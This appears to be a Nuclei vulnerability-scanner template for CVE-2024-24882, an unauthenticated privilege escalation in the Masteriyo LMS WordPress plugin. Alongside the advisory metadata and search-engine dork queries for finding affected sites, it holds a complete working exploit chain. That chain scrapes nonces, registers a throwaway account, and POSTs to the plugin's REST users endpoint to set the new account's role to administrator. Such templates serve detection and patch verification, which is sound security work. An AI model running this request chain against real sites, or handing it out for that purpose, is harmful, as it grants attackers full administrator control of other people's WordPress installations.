id: CVE-2024-24882 info: name: Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation author: riteshs4hu severity: critical description: | The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the update_logged_in_user() function in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator. impact: | An unauthenticated attacker can escalate privileges and gain full administrator access. remediation: | Update the Masteriyo LMS plugin to version 1.7.3 or later and ensure proper capability checks are enforced. reference: - https://wpscan.com/vulnerability/8407f428-12e7-4549-aa65-a241b7bdca41/ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system/masteriyo-lms-172-unauthenticated-privilege-escalation - https://plugins.trac.wordpress.org/changeset/3022839/learning-management-system/tags/1.7.3/includes/RestApi/Controllers/Version1/UsersController.php?old=2959283&old_path=learning-management-system%2Ftrunk%2Fincludes%2FRestApi%2FControllers%2FVersion1%2FUsersController.php - https://nvd.nist.gov/vuln/detail/CVE-2024-24882 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-24882 epss-score: 0.48278 epss-percentile: 0.97792 cwe-id: CWE-269 cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:* metadata: verified: true max-request: 4 vendor: themegrill product: masteriyo fofa-query: body="/wp-content/plugins/learning-management-system/" google-query: inurl:"/wp-content/plugins/learning-management-system/" tags: cve,cve2024,wordpress,wp,wp-plugin,lms,priv-esc,learning-management-system,vkev,intrusive variables: uname: "{{rand_base(4)}}" http: - raw: - | GET /account/signup/ HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: wpnonce group: 1 regex: - 'name="_wpnonce"[^>]*?value="([A-Za-z0-9]+)"' internal: true - raw: - | POST /account/signup/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded remember=true&first-name={{uname}}&last-name={{uname}}&username={{uname}}&email={{uname}}%40gmail.com&password=Test%40123&confirm-password=Test%40123&_wpnonce={{wpnonce}}&_wp_http_referer=%2Faccount%2Fsignup%2F&masteriyo-registration=yes redirects: true - raw: - | GET /account/ HTTP/1.1 Host: {{Hostname}} redirects: true extractors: - type: regex name: profile_nonce part: body group: 1 regex: - '"nonce":"([a-zA-Z0-9]+)"' internal: true - raw: - | POST /wp-json/masteriyo/v1/users/me/?_locale=user HTTP/1.1 Host: {{Hostname}} X-WP-Nonce: {{profile_nonce}} Content-Type: application/json {"first_name":"{{uname}}","last_name":"{{uname}}","email":"{{uname}}@gmail.com","role":"administrator","billing":{"state":"No state found"}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(tolower(content_type), "application/json")' - 'contains(body, "\"roles\":[\"administrator\"]")' condition: and # digest: 490a00463044022070163c770e87f109e86dc223bc21c8f6668911c446b8435f52fddd2a226d4fe402201d51fcc305027669bb72f19ff052e106196e5ab5953c21bcc21714cb1a6e2437:922c64590222798bb761d5b6d8e72950